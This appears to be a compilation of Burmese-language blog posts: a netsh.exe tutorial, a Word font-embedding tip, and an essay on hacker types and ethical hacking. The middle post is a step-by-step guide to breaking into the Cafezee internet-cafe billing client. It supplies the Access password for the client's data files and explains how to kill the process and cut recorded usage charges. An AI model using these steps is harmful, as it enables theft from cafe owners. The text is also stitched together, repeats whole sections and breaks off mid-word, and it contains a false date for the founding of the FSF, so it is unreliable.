Netsh.exe ကို Windows 2000, Windows XP နဲ႕ Windows Server 2003 တို႕မွာအသုံးျပဳႏိုင္ပါတယ္။
Netsh.exe ကိုအသုံးျပဳၿပီးေတာ့သင္ေအာက္ပါ
* Configure interfaces
* Configure routing protocols
* Configure filters
* Configure routes
* Configure remote access behaviorfor Windows-based remote access routers that are running the Routingand Remote Access Server (RRAS) Service
* Display the configuration of a currently running router on any computer
* Use the scripting feature to run a collection of commands in batch mode against a specified router.
Netsh.exe ကိုအသုံးျပဳၿပီးေတာ့သင့္ရဲ႕ TCP/IP Setting ကိုၾကည္႕ခ်င္ရင္ေအာက္ပါအတိုင္း CMD (Command Prompt) တြင္ရိုက္ထည္႕ပါ။
netsh interface ip show config
ကြန္ပ်ဳဳတာရဲ႕ TCP/IP setting နဲ႕ တစ္ျခား TCP/IP နဲ႕ပတ္သတ္တဲ့ setting ေတြကိုလည္းျပင္လို႕ပါတယ္။ ( ဥပမာ-
Interface name ကို Local Area Connection နဲ႕ Static IP 192.168.0.100 နဲ႕ Mask Address ကေတာ့ 255.255.255.0 နဲ႕
default gateway ကို 192.168.0.1 လို႕ေပးခ်င္တယ္ဆိုရင္….) ေအာက္ပါအတိုင္း CMD တြင္ရိုက္ထည္႕ပါ။
netsh interface ip set address name=”Local Area Connection” static 192.168.0.100 255.255.255.0 192.168.0.1 1
အေပၚက command line သည္တစ္ေၾကာင္းတည္းသာဆက္ရိုက္ရပါ
Netsh.exe ကိုဒီလိုအေျခအေနမ်ိဳးတြင္လည္း
ပထမဆုံးသင့္ notebook computer နဲ႕ ပထမေနရာ location #1 ကိုသြားၿပီးlocaiton #1 အတြက္လိုအပ္တဲ့ TCP/IP setting ေတြကိုျဖည္႕ပါ ( IP address,Subnet Mask, Default Gateway, DNS နဲ႕ WINS address ေတြထည္႕ပါ)
ေနာက္ၿပီးယခုထည္႕ထားတဲ့ TCP/IP Setting ေတြကို text ဖိုင္အေနျဖင့္ေအာက္ပါအတိုင္း CMD တြင္ရိုက္ထည္႕ၿပီးထုတ္ပါမယ္
netsh -c interface dump > c:\location1.txt
ဒုတိယေနရာ location #2 ေရာက္ရင္လည္းအထက္ပါအတိုင္း location #2အတြက္လိုအပ္တဲ့ TCP/IP setting ေတြကိုျဖည္႕ၿပီး textဖိုင္အေနျဖင့္ထုတ္ပါမယ္။
netsh -c interface dump > c:\location2.txt
တျခားေနရာေတြရိွေသးရင္လည္းအထက္
ယခုသင္ထုတ္ထားတဲ့ location #1 နဲ႕ location #2 အတြက္ TCP/IP Settingေတြကို ျပန္လည္ထည္႕သြင္းခ်င္တယ္ဆိုရင္ေ
location #1 အတြက္ဆိုရင္
netsh -f c:\location1.txt
location #2 အတြက္ဆိုရင္
netsh -f c:\location2.txt
-f အစား exec ဆိုတာထည္႕သြင္အသုံးျပဳႏိုင္ပါေ
location #1 အတြက္ဆိုရင္
netsh -f c:\location1.txt
Netsh.exe ကိုသင့္ရဲ႕ Network အတြက္ DHCP Server မွ အလိုအေလ်ာက္ေပးတဲ့IP adress မ်ိဳးရခ်င္တဲ့ setting ကိုထည္႕ခ်င္ရင္ေအာက္ပါအတိုင္း CMDတြင္ရိုက္ထည္႕ပါ။
netsh interface ip set address “Local Area Connection” dhcp
Netsh.exe ကိုသုံးၿပီး DNS နဲ႕ WINS address ကိုေျပာင္းခ်င္ရင္ေအာက္ပါအတိုင္
DNS address ကိုေျပာင္းခ်င္ရင္
netsh interface ip set dns “Local Area Connection” static 192.168.0.200
WINS address ကိုေျပာင္းခ်င္ရင္
netsh interface ip set wins “Local Area Connection” static 192.168.0.200
DNS setting ကို dynamically ရခ်င္ရင္
netsh interface ip set dns “Local Area Connection” dhcp
Netsh.exe ဟာအရမ္းအသုံး၀င္တဲ့ utility လို႕ေျပာခ်င္ပါတယ္။ အထက္ပါcommand မ်ားဟာ Netsh.exeရဲ႕အသုံး၀င္ပုံတစ္စိတ္
ကြ်န္ေတာ္တို႔ microsoft word ဖိုင္ေတြကို ရွားရွားပါးပါးေဖာင့္ေတြနဲ႔ေရး
ဥပမာ… ကြ်န္ေတာ္တို႔ေတြ အြန္လိုင္းမွာ MS word ကိုသူငယ္ခ်င္းတစ္ေယာက္ကိုလွမ္းေ
နည္းကလည္း ထံုးစံအတိုင္းပဲ မခက္ပါဘူး။
MS word 2003 အတြက္
မိုက္ကရိုေဆာ့၀တ္ ဖိုင္ကိုဖြင့္ Save as လုပ္။ Save as Box က်လာရင္အဲဒီေဘာက္စ္ ေလးရဲ့ ညာဘက္ Title ဘားေအာက္မွာ Tools ေဘးကမွ်ားေလးကိုဖြင့္Save Option ကိုကလစ္လုပ္ Box တစ္ခုထပ္က်လာရင္ Embed True Type Fontsဆိုတဲ့ေနရာမွာေကာ၊ Embed characters in use only ဆိုတဲ့ေနရာမွာေကာခ်က္ေဘာက္ေလးေ
MS word 2007 အတြက္
မိုက္ကရိုေဆာ့၀တ္ ဖိုင္ကိုဖြင့္ Save asကိုကလစ္။ Save as Box က်လာရင္ အဲဒီေဘာက္စ္ေလးရဲ့ ဘယ္ဘက္ေအာက္မွာ Toolsေဘးကမွ်ားေလးကိုဖြင့္ Save Option ကိုကလစ္လုပ္ Box တစ္ခုထပ္က်လာရင္ Embedfonts in the file ဆိုတဲ့ေနရာမွာေကာ၊ Embed only the characters used inthe document ဆိုတဲ့ေနရာမွာေကာ ခ်က္ေဘာက္ေလးေတြကို အမွန္ျခစ္ေပးရပါမယ္။ၿပီးရင္ေတာ့ OK ေပါ့။ ၿပီးရင္ေတာ့ ႀကိဳက္တဲ့ေနရာမွာသိမ္း။
This post is copy from http://yemankstu.co.cc/အရင္ဆံုး C:\windows\system32 ထဲက client.pra နဲ႕ client2.pra ဆိုတဲ့ file ႏွစ္ file ကို copy ကူးလိုက္ပါ...
ၿပီးရင္အဲဒီ file ႏွစ္ file ကို msaccess (Microsoft Access) နဲ႕ဖြင့္လိုက္ပါ....တစ္ဖိုင္ခ်
password လာေတာင္းလိမ့္မယ္...[vanarp117] လို႔ရိုက္ထည့္လိုက္ပါ..(ေလးေထာ
ပြင့္သြားရင္...control ထဲကို၀င္ၿပီးေတာ့ Admin Password ကို ဖ်က္လုိက္ပါ...သူက encrypt လုပ္ထားတယ္...
decrypt မလုပ္နဲ႕...အခ်ိန္ေတြၾကာတယ္...
ၿပီးရင္ taskmgr (Windows Task Manager) ကိုဖြင့္ၿပီး Explorer .exe ကို End Process လုပ္ေပးပါ...
ၿပီးရင္ အဲဒီျပင္ထားတဲ့ ဖိုင္ႏွစ္ဖိုင္ကို copy ကူးၿပီးေတာ့ သူ႔ရဲ႕မူရင္း folder ထဲကိုျပန္ထည့္ေပးပါ...
"အထဲမွာနာမည္တူဖိုင္ရွိေနပါတယ္.
သူ႔ရဲ႕ Admin Option ထဲကို၀င္လိုက္ရင္ passwordလာေတာင္းလိမ့္မယ္..ကၽြ
Admin Option ထဲမွာ ခင္ဗ်ားရဲ႕ ဘယ္ဘက္ေထာင့္မွာ Adjustment ဆိုတာကိုclick လုပ္ေပးလိုက္ပါ...အဲဒီထဲမွာ (သူ႔ရဲ႕ Label ေတာ့ေမ့သြားၿပီ) Text Box2 ခုရွိတယ္...ေအာက္က Text Box က comment ..အေပၚက Text Box မွာခင္ဗ်ားေလွ်ာ့ခ်င္တာကိုေလွ်ာ
(ပိုက္ဆံနဲ႕သံုးတာဆိုရင္ ပိုက္ဆံကိုေလွ်ာ့ပါ...1000 ရွိၿပီဆိုရင္ 1000 ထိပဲရမယ္ေနာ္..Negative လက္မခံပါဘူး....)
(Member ဆိုရင္ေတာ့ သံုးထားတဲ့ နာရီထက္ပိုၿပီးေလွ်ာ့လို႔မရပါဘူ
ကိုုယ္ေလွ်ာ့ခ်င္တာေလွ်ာ့ၿပီး
(ေလွ်ာ့ၿပီးေတာ့ continue ကို click လုပ္မယ္ဆိုရင္ ဘာမွမထူးဘူးေနာ္)
အကယ္၍ taskmgr ပိတ္ထားခဲ့ရင္ Process Explorer နဲ႕ End Process လုပ္ပါ..
Process Explorer download Link ကဒီမွာပါ...
http://www.download.
Process Explorer သံုးမယ္ဆိုရင္ End Process မဟုတ္ပါဘူး..Kill Process ပါ..
End Process မွာ explorer ခ်င္းမမွားပါေစနဲ႕...
windows explorer က [explorer.exe] ပါ
Cafezee က [Explorer .exe] ပါ
အခုမွစလုပ္သူမ်ား အခက္အခဲရွိရင္ Taskmgr ထဲက Application ထဲမွာ Explorer ကို Right Click ေထာက္ၿပီး
Goto Process ကို click လုပ္ပါ..ၿပီးရင္ သူ Select လုပ္ေပးထားတာကိုပဲ End Process လုပ္ေပးလိုက္ပါ..
windows ရွိတဲ့ partition ကို ေဖ်ာက္ထားတယ္ဆိုရင္ DOS ကေန copy ကူးပါ..
ဥပမာ..
cd\
cd windows\system32 copy client*.pra D:\
အဲဒီလိုကူးၾကည့္ပါ...
အားလံုးအဆင္ေျပၾကပါေစ...
အခန္း ၄ - ဟက္ကာဆိုတာဘယ္သူလဲ
ဒီအခန္းမွာ ဟက္ကာဆိုတဲ့ စကားလံုးကို အဓိပၸါယ္ကၽႊန္ေတာ္သတ္မွတ္ခ်င္ပါ
မင္းမဲ့စရိုက္ဟက္ကာမ်ား (Anarchist Hackers)
ဒီလိုဟက္ကာအမ်ိဳးအစားေတြကို ဂရုစိုက္ရမဲ့ထဲမွာပါပါတယ္။ သူတို႔ေတြ စနစ္ကိုခ်ိဳးေဖာက္ဝင္ေရာက္ျခင္း
ဟက္ကာ
ဟက္ကာတစ္ေယာက္ဟာ ဘယ္သတင္းအခ်က္အလက္မဆို လြတ္လပ္စြာ ခြင့္ၿပဳခြင့္ကို ျမတ္ႏိုးယံုၾကည္ပါတယ္။ ဟက္ကာေတြဟာ မ်ားေသာအားျဖင့္ ပါးနပ္ၿပီး စာဖတ္သူစက္ေပၚမွာ ဘာေတြရွိလဲကို သိပ္ဂရုစိုက္ေလ့မရွိပါဘူး။ သူတို႔ေတြက အသိပညာအေနႏွင့္ စနစ္ကိုဘယ္လိုထိုးေဖာက္ႏိုင္လဲ
ဟက္ကာအစစ္္ေတြက အစိုးရႏွင့္ဆက္ႏြယ္ေသာ၊ တကၠသိုလ္၊ ငွာနေတြကိုပဲ စိတ္ဝင္စားမွဳရွိပါတယ္။ သူတို႔ေတြက အေရးႀကီးတဲ့ သတင္းနည္းပညာေတြကို ဒီလိုပတ္ဝန္းက်င္မွာ လိုက္ရွာတတ္ပါယ္။ သူတို႔ေတြက အႏၱရာယ္ကို ေက်ေက်နပ္နပ္ခံယူတာပါ။ ဘာျဖစ္လို႔လဲဆိုေတာ့ လံုျခံဳမွဳေကာင္းေလေလ စိမ္ေခၚမွဳမ်ားေလေလပါ။ စိမ္ေခၚမွဳမ်ားတဲ့အတြက္ သူတို႔ေတြပိုေတာ္ေအာင္ လုပ္ရေလေလပါပဲ။ သူတို႔ေတြက Programming မွာ ပါးနပ္ပါတယ္။ သိပ္ၿပီးလဲၾကြားခ်င္းမရွိပါဘူး သူတို႔လုပ္ႏိုင္တာကို။ သူတို႔ေတြက လိုက္ကာေနာက္မွ မင္းသားမင္းသမီးေတြအတြက္ ျပင္ဆင္ေပးတဲ့ အဖြဲ႔သားေတြလိုပါပဲ။ လူသိမခံေအာင္ တတ္ႏိုင္သ၍ ေနပါတယ္။ ဟက္ကာေတြက အေပါင္းအသင္းမရွိတဲ့ လူေတြရယ္လို႔ မဟုတ္ပါဘူး။ သူတို႔ယံုၾကည္ရတဲ့ Social Network ေလးမွာ လူမသိသူမသိေလးက်င္လည္ေနတာပါ။
Crackers
သူတို႔ေတြက Software Copyright Protection ကို ေက်ာ္လႊားတဲ့အတတ္ပညာမွဳ အလြန္ကၽႊမ္းက်င္တဲ့ လူတန္းစားပါ။ Programming ကိုအလြန္ပင္ ကၽႊမ္းက်င္တဲ့ လူေတြပါ။ ဟက္ကာနဲ႔ Crackers ကို ရွင္းလင္းစြာမသိၾကပါဘူး။ သူတို႔ရဲ့ ယံုၾကည္ခ်က္ နီးစပ္ပါတယ္။ ဟက္ကာေရာ Cracker ေရာ တားစီးမွဳလံုၿခံဳေရး တစ္ခုစီကို တိုက္ခိုက္ေနတာပါ။ ဒါေပမဲ့ လံုးဝကြဲျပားတဲ့ အမ်ိဳးအစားႏွစ္ခုပါ။
Ethical Hacking and Penetration Testing
Confidentiality ဆုိတာကေတာ့အေရးၾကီးတဲ့ အခ်က္အလက္ေတြကို ခြင့္ျပဳခ်က္မရသူေတြ
ၾကည့္လို႔မရ၊ ယူလို႔မရ၊ သုံးလို႔မရေအာင္လုပ္ထားတာကိုဆို လိုတာပါ။
Integrity ဆိုတာကေတာ့ Information System ရဲ႕အရည္အေသြးကိုဆိုလိုတာပါ။ ထပ္ခ်ဲ႕ရရင္ ...
ဘယ္ေလာက္ယုံၾကည္ရတယ္၊ ဘယ္ေလာက္စစ္မွန္တယ္၊ ဘယ္ေလာက္ျပည့္စုံတယ္ ဆိုတာေတြကို
ဆိုလိုတာပါ။
ံHacker ဆိုတာကေတာ့ လိုအပ္ခ်က္အနည္းဆုံးနဲ႔ အျမင့္မားဆုံးစြမ္းေဆာင္ႏိုင္သူ ေတြကိုေခၚတာပါပဲ။
Hacker, who makes furniture with an axe လို႔ေျပာၾကပါတယ္။ ပုဆိန္ တစ္လက္နဲ႕ေတာင္
ပရိေဘာဂ ပစၥည္းေတြကို လုပ္ႏိုင္တဲ့သူလို႔ တင္စားေခၚေ၀ၚတာပါပဲ။ ဒါေပမယ့္ ပညာကို တစ္လြဲသုံးၾက
သူေတြေၾကာင့္ white ေတြ black ေတြ Gray ေတြေပၚလာၾကရတာပါ။
Hacking နဲ႔ပတ္သက္လို႔ ေက်ာ္ၾကားခဲ့သူေတြ တစ္ခ်ဳိ႕ကို ေျပာျပပါ့မယ္။
Dennis Ritchie နဲ႕ Ken Thompson တို႔ဟာ နာမည္ေက်ာ္ ဘဲ(လ္)ဓာတ္ခြဲခန္းေတြမွာ လုပ္ခဲ့ၾကရင္းက
UNIX Operation System ကို ၁၉၆၉ ခုႏွစ္မွာ စျပီးေရးခဲ့ၾကပါတယ္။
Richard Stallman ဟာ Free Software Foundation ကို ၁၉၆၉ ခုႏွစ္မွာပဲ စတင္ တည္ေထာင္ခဲ့ျပီး၊
Unix နဲ႔တူေပမယ့္ Unix မဟုတ္တဲ့GNU Operating System ကို ၁၉၈၄ ခုႏွစ္မွာ စျပီးဖန္တီးခဲ့ပါတယ္။
GNU နဲ႔ linux တြဲထားတာကို GNU/Linux လို႔ေခၚၾကေပမယ့္ မွားယြင္းျပီး Linux လို႔ပဲေခၚၾကတာက
မ်ားပါတယ္။ ကေန႔မွာေတာ့ GNU/Linux ေတြအမ်ားၾကီးေပၚေနျပီျဖစ္ျပီး အဲဒါေတြအားလုံးဟာ 100%
အလကားေပးတာေတြခ်ည္းပါ။
Phiber Optik ဆိုတဲ့ နာမည္၀ွက္နဲ႔ လႈပ္ရွားခဲ့တဲ့ Mark Abene ကေတာ့ Masters of Deception ဆိုတဲ့
အဖြဲ႕ကို ၁၉၉၀ မွာ တည္ေထာင္ခဲ့ျပီး IT ေလာကမွာ အေႏွာင့္အယွက္ေတြလုပ္ခဲ့တာေၾကာ င့္ ၁၉၉၂ ခုႏွစ္
မွာ အဖမ္းခံခဲ့ရပါတယ္။
Dark Dante ဆိုတဲ့ နာမည္၀ွက္နဲ႕ လႈပ္ရွားခဲ့တဲ့ Kevin Poulsen ကေတာ့ ၁၉၉၀ ခုႏွစ္တုန္းက
ေလာ့(စ္)အင္ဂ်လိျမိဳ႕မွာ လုပ္ခဲ့တဲ့ ဖုန္းေခၚျပိဳင္ပြဲမွာ အႏိုင္ရခဲ့တာေၾကာင့္ Porsche 944 ကားတစ္စီး
ရခဲ့ေပမယ့္၊ ေနာက္ပိုင္းမွာ အမႈေတြလုပ္ခဲ့တာေၾကာင့္ အဖမ္းခံခဲ့ရျပန္ပါတယ္။ ခုေတာ့ သူဟာ
securityfocus.com အတြက္ အလုပ္လုပ္ေပးေနပါတယ္။
Robert Morris ဆိုတာကေတာ့ အေမရိကန္ျပည္ေထာင္စုရဲ႕အမ်ဳိးသာ းလုံျခံဳေရးအဂ်င္စီက သိပၸံပညာရွင္အဖြဲ႕
ေခါင္းေဆာင္ရဲ႕သားျဖစ္ျပီး၊ ေမာရစ္ worm ကို ၁၉၈၈ ခုႏွစ္မွာအမွတ္မထင္ ဖန္တီးခဲ့သလိုျဖစ္သြားသူပါပဲ။
Condor ဆိုတဲ့ နာမည္၀ွက္နဲ႔ လႈပ္ရွားခဲ့တဲ့ Kevin Mitnick ကေတာ့ FBI က အလိုခ်င္ဆုံး Hacker တစ္ေယာက္
ပထမဆုံးျဖစ္ခဲ့ျပီး ၁၉၉၄ခုႏွစ္မွာ အဖမ္းခံခဲ့ရပါတယ္။ အခုေတာ့ ျပန္လြတ္ေနျပီး ထင္ရွားသူတစ္ေယာက္အျဖစ္
ရပ္တည္ေနပါျပီ။
Tsutomu Shimomura ကေတာ့ ကီဗင္က သူ႔ကြန္ပ်ဴတာထဲကိုေဖါက္၀င္ျပီး၊
ေဒတာေတြကိုလဲယူသြားေရာ FBI နဲဲ႕ ေပါင္းလိုက္တဲ့ Hacker တစ္ေယာက္ပါပဲ။
Steve Wozniak နဲ႕ Steve Jobs တုိ႔ ႏွစ္ေယာက္ကေတာ့ Apple ကြန္ပ်ဴတာကို စတင္ဖန္တီးခဲ့သူေတြပါ။
Bill Gates နဲ႕ Linux Torvalds တို႔ႏွစ္ေယာက္ကိုေတာ့ ေျပာျပဖို႔ေတာင္လိုမယ္မထင္ပါဘူး ။
Hacking စေပၚေပါက္ခဲ့တာနဲ႔ပတ္သက္လို႔ ဇာတ္လမ္းေလးတစ္ခုရွိပါတယ္။ အဲဒါကေတာ့
ဘဲ(လ္)တယ္လီဖုန္းကုမၸဏီကဖုန္းလိ ုင္းေတြ ၁၈၇၈ ခုႏွစ္က စတင္လိုင္းဆြဲခဲ့ရာမွာ ဆယ္ေက်ာ္သက္
အရြယ္လူငယ္တစ္စုက ၾကားကျဖတ္ျပီးေနာက္ေျပာင္ႏိုင္ ခဲ့တာပါပဲ။ အဲဒီေနာက္ပိုင္းမွာေတာ့
အမ်ဳိးသမီး တယ္လီဖုန္း ေအာ္ပေရတာေတြကိုပဲ အလုပ္ခန္႔ၾကပါေတာ့သတဲ့။
ကေန႔ေခတ္ ဟက္ကာေတြကေတာ့ အခ်င္းခ်င္း ခိုင္ခိုင္မာမာ ဆက္သြယ္မႈရွိၾကပါတယ္။
အခေၾကးေငြယူျပီးအလုပ္လုပ္ၾကတာေ တြရွိသလို၊ ၀ါသနာအရလုပ္ၾကသူေတြလဲရွိျပီး၊
ႏိုင္ငံေရးေၾကာင့္၊ စီးပြားေရးေၾကာင့္၊ သိခ်င္စိတ္ေၾကာင့္၊ မေတာ္တဆလုပ္မိတာ စတဲ့ အေၾကာင္းျပခ်က္
ေတြ အမ်ဳိးမ်ဳိးနဲ႔ ဟက္ကာေတြ အေတာ္မ်ားမ်ားေပၚေပါက္ေနၾကပါျပီ ။
အဲဒီမွာမွ ... White Hat, Black Hat နဲ႔ Gray Hat ဆိုျပီးသုံးမ်ဳိးကြဲလာျပန္ပါတယ္ ။
အျဖဴနဲ႔ အမည္းကေတာ့ ေကာင္းတာနဲ႔ မေကာင္းတာျဖစ္ျပီး၊ Gray ကေတာ့ ႏွစ္မ်ဳိးစလုံးကိ
အလ်ဥ္းသင့္သလို လုပ္သြားတတ္သူေတြပါပဲ။
Information System တစ္ခု၊ Nework တစ္ခု၊ Application တစ္ခု၊ Software တစ္ခုရဲ႕
အားနည္းခ်က္ နဲ႔ အဲဒီ အားနည္းခ်က္ကို အသုံးခ်ျပီး တစ္ေယာက္ေယာက္က အက်ဳိးသက္ေရာက္မႈ
တစ္ခုခု လုပ္သြားႏိုင္တာကို Vulnerability လို႔သတ္မွတ္ပါတယ္။
အဲဒီ Vulnerability ကို အသုံးခ်ျပီး တစ္ခုခုလုပ္ဖို႔ၾကိဳးစားတာကို Threat လို႔သတ္မွတ္ပါတယ္။
ဒီေတာ့ကာ ...
Risk = Vulnerabilities x Threats ဆိုတဲ့ ညီမွ်ခ်င္းတစ္ခုကိုရလာပါေတာ့တယ္ ။
Risk Management ဟာ Ethical Hacker ေတြရဲ႕ အလုပ္ျဖစ္လာပါတယ္။
ဟုတ္ျပီ။ ဒီေတာ့ကာ Ethical Hacking ဆိုတာကို ...
“Ethical” hacking is the authorized probing of information systems for vulnerabilities and
weakness
Confidentiality ဆုိတာကေတာ့အေရးၾကီးတဲ့ အခ်က္အလက္ေတြကို ခြင့္ျပဳခ်က္မရသူေတြ
ၾကည့္လို႔မရ၊ ယူလို႔မရ၊ သုံးလို႔မရေအာင္လုပ္ထားတာကိုဆို
Integrity ဆိုတာကေတာ့ Information System ရဲ႕အရည္အေသြးကိုဆိုလိုတာပါ။ ထပ္ခ်ဲ႕ရရင္ ...
ဘယ္ေလာက္ယုံၾကည္ရတယ္၊ ဘယ္ေလာက္စစ္မွန္တယ္၊ ဘယ္ေလာက္ျပည့္စုံတယ္ ဆိုတာေတြကို
ဆိုလိုတာပါ။
ံHacker ဆိုတာကေတာ့ လိုအပ္ခ်က္အနည္းဆုံးနဲ႔ အျမင့္မားဆုံးစြမ္းေဆာင္ႏိုင္သူ
Hacker, who makes furniture with an axe လို႔ေျပာၾကပါတယ္။ ပုဆိန္ တစ္လက္နဲ႕ေတာင္
ပရိေဘာဂ ပစၥည္းေတြကို လုပ္ႏိုင္တဲ့သူလို႔ တင္စားေခၚေ၀ၚတာပါပဲ။ ဒါေပမယ့္ ပညာကို တစ္လြဲသုံးၾက
သူေတြေၾကာင့္ white ေတြ black ေတြ Gray ေတြေပၚလာၾကရတာပါ။
Hacking နဲ႔ပတ္သက္လို႔ ေက်ာ္ၾကားခဲ့သူေတြ တစ္ခ်ဳိ႕ကို ေျပာျပပါ့မယ္။
Dennis Ritchie နဲ႕ Ken Thompson တို႔ဟာ နာမည္ေက်ာ္ ဘဲ(လ္)ဓာတ္ခြဲခန္းေတြမွာ လုပ္ခဲ့ၾကရင္းက
UNIX Operation System ကို ၁၉၆၉ ခုႏွစ္မွာ စျပီးေရးခဲ့ၾကပါတယ္။
Richard Stallman ဟာ Free Software Foundation ကို ၁၉၆၉ ခုႏွစ္မွာပဲ စတင္ တည္ေထာင္ခဲ့ျပီး၊
Unix နဲ႔တူေပမယ့္ Unix မဟုတ္တဲ့GNU Operating System ကို ၁၉၈၄ ခုႏွစ္မွာ စျပီးဖန္တီးခဲ့ပါတယ္။
GNU နဲ႔ linux တြဲထားတာကို GNU/Linux လို႔ေခၚၾကေပမယ့္ မွားယြင္းျပီး Linux လို႔ပဲေခၚၾကတာက
မ်ားပါတယ္။ ကေန႔မွာေတာ့ GNU/Linux ေတြအမ်ားၾကီးေပၚေနျပီျဖစ္ျပီး အဲဒါေတြအားလုံးဟာ 100%
အလကားေပးတာေတြခ်ည္းပါ။
Phiber Optik ဆိုတဲ့ နာမည္၀ွက္နဲ႔ လႈပ္ရွားခဲ့တဲ့ Mark Abene ကေတာ့ Masters of Deception ဆိုတဲ့
အဖြဲ႕ကို ၁၉၉၀ မွာ တည္ေထာင္ခဲ့ျပီး IT ေလာကမွာ အေႏွာင့္အယွက္ေတြလုပ္ခဲ့တာေၾကာ
မွာ အဖမ္းခံခဲ့ရပါတယ္။
Dark Dante ဆိုတဲ့ နာမည္၀ွက္နဲ႕ လႈပ္ရွားခဲ့တဲ့ Kevin Poulsen ကေတာ့ ၁၉၉၀ ခုႏွစ္တုန္းက
ေလာ့(စ္)အင္ဂ်လိျမိဳ႕မွာ လုပ္ခဲ့တဲ့ ဖုန္းေခၚျပိဳင္ပြဲမွာ အႏိုင္ရခဲ့တာေၾကာင့္ Porsche 944 ကားတစ္စီး
ရခဲ့ေပမယ့္၊ ေနာက္ပိုင္းမွာ အမႈေတြလုပ္ခဲ့တာေၾကာင့္ အဖမ္းခံခဲ့ရျပန္ပါတယ္။ ခုေတာ့ သူဟာ
securityfocus.com အတြက္ အလုပ္လုပ္ေပးေနပါတယ္။
Robert Morris ဆိုတာကေတာ့ အေမရိကန္ျပည္ေထာင္စုရဲ႕အမ်ဳိးသာ
ေခါင္းေဆာင္ရဲ႕သားျဖစ္ျပီး၊ ေမာရစ္ worm ကို ၁၉၈၈ ခုႏွစ္မွာအမွတ္မထင္ ဖန္တီးခဲ့သလိုျဖစ္သြားသူပါပဲ။
Condor ဆိုတဲ့ နာမည္၀ွက္နဲ႔ လႈပ္ရွားခဲ့တဲ့ Kevin Mitnick ကေတာ့ FBI က အလိုခ်င္ဆုံး Hacker တစ္ေယာက္
ပထမဆုံးျဖစ္ခဲ့ျပီး ၁၉၉၄ခုႏွစ္မွာ အဖမ္းခံခဲ့ရပါတယ္။ အခုေတာ့ ျပန္လြတ္ေနျပီး ထင္ရွားသူတစ္ေယာက္အျဖစ္
ရပ္တည္ေနပါျပီ။
Tsutomu Shimomura ကေတာ့ ကီဗင္က သူ႔ကြန္ပ်ဴတာထဲကိုေဖါက္၀င္ျပီး၊
ေဒတာေတြကိုလဲယူသြားေရာ FBI နဲဲ႕ ေပါင္းလိုက္တဲ့ Hacker တစ္ေယာက္ပါပဲ။
Steve Wozniak နဲ႕ Steve Jobs တုိ႔ ႏွစ္ေယာက္ကေတာ့ Apple ကြန္ပ်ဴတာကို စတင္ဖန္တီးခဲ့သူေတြပါ။
Bill Gates နဲ႕ Linux Torvalds တို႔ႏွစ္ေယာက္ကိုေတာ့ ေျပာျပဖို႔ေတာင္လိုမယ္မထင္ပါဘူး
Hacking စေပၚေပါက္ခဲ့တာနဲ႔ပတ္သက္လို႔ ဇာတ္လမ္းေလးတစ္ခုရွိပါတယ္။ အဲဒါကေတာ့
ဘဲ(လ္)တယ္လီဖုန္းကုမၸဏီကဖုန္းလိ
အရြယ္လူငယ္တစ္စုက ၾကားကျဖတ္ျပီးေနာက္ေျပာင္ႏိုင္
အမ်ဳိးသမီး တယ္လီဖုန္း ေအာ္ပေရတာေတြကိုပဲ အလုပ္ခန္႔ၾကပါေတာ့သတဲ့။
ကေန႔ေခတ္ ဟက္ကာေတြကေတာ့ အခ်င္းခ်င္း ခိုင္ခိုင္မာမာ ဆက္သြယ္မႈရွိၾကပါတယ္။
အခေၾကးေငြယူျပီးအလုပ္လုပ္ၾကတာေ
ႏိုင္ငံေရးေၾကာင့္၊ စီးပြားေရးေၾကာင့္၊ သိခ်င္စိတ္ေၾကာင့္၊ မေတာ္တဆလုပ္မိတာ စတဲ့ အေၾကာင္းျပခ်က္
ေတြ အမ်ဳိးမ်ဳိးနဲ႔ ဟက္ကာေတြ အေတာ္မ်ားမ်ားေပၚေပါက္ေနၾကပါျပီ
အဲဒီမွာမွ ... White Hat, Black Hat နဲ႔ Gray Hat ဆိုျပီးသုံးမ်ဳိးကြဲလာျပန္ပါတယ္
အျဖဴနဲ႔ အမည္းကေတာ့ ေကာင္းတာနဲ႔ မေကာင္းတာျဖစ္ျပီး၊ Gray ကေတာ့ ႏွစ္မ်ဳိးစလုံးကိ
အလ်ဥ္းသင့္သလို လုပ္သြားတတ္သူေတြပါပဲ။
Information System တစ္ခု၊ Nework တစ္ခု၊ Application တစ္ခု၊ Software တစ္ခုရဲ႕
အားနည္းခ်က္ နဲ႔ အဲဒီ အားနည္းခ်က္ကို အသုံးခ်ျပီး တစ္ေယာက္ေယာက္က အက်ဳိးသက္ေရာက္မႈ
တစ္ခုခု လုပ္သြားႏိုင္တာကို Vulnerability လို႔သတ္မွတ္ပါတယ္။
အဲဒီ Vulnerability ကို အသုံးခ်ျပီး တစ္ခုခုလုပ္ဖို႔ၾကိဳးစားတာကို Threat လို႔သတ္မွတ္ပါတယ္။
ဒီေတာ့ကာ ...
Risk = Vulnerabilities x Threats ဆိုတဲ့ ညီမွ်ခ်င္းတစ္ခုကိုရလာပါေတာ့တယ္
Risk Management ဟာ Ethical Hacker ေတြရဲ႕ အလုပ္ျဖစ္လာပါတယ္။
ဟုတ္ျပီ။ ဒီေတာ့ကာ Ethical Hacking ဆိုတာကို ...
“Ethical” hacking is the authorized probing of information systems for vulnerabilities and
weakness